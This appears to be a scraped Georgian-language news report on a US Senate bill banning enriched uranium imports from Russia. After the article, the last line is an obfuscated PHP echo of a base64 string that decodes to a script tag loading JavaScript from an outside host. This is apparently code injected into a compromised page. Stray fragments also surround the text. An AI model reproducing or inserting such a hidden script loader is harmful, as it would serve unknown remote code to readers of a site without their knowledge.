celsiusi
ავერსი შნაიდერი

 შეერთებული შტატების სენატმა მხარი დაუჭირა კანონპროექტს, რომელიც კრძალავს რუსეთის ფედერაციიდან გამდიდრებული ურანის იმპორტს.

„ბლუმბერგის“ ინფორმაციით, დოკუმენტი რუსეთიდან აშშ-ში გამდიდრებული ურანის იმპორტს კრძალავს ძალაში შესვლიდან 90 დღის შემდეგ. თუმცა, დროებითი გამონაკლისები ნებადართულია 2028 წლის იანვრამდე.

აღსანიშნავია, რომ კონგრესში განიხილეს 2.7 მილიარდი დოლარის გამოყოფა, რომელიც მოხმარდება აშშ-ის ურანის ინდუსტრიის განვითარებას, რუსეთიდან ნედლეულის იმპორტზე შეზღუდვების დაწესების პირობით.

როგორც აშშ-ის ენერგეტიკის დეპარტამენტმა განაცხადა, რუსეთი გამდიდრებული ურანის მთავარი უცხოური მიმწოდებელია, რაც რუსეთის ეკონომიკას წელიწადში, დაახლოებით ერთ მილიარდ დოლარს აძლევს.

კანონპროექტს აშშ-ს პრეზიდენტმა, ჯო ბაიდენმა უნდა მოაწეროს ხელი.

175
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");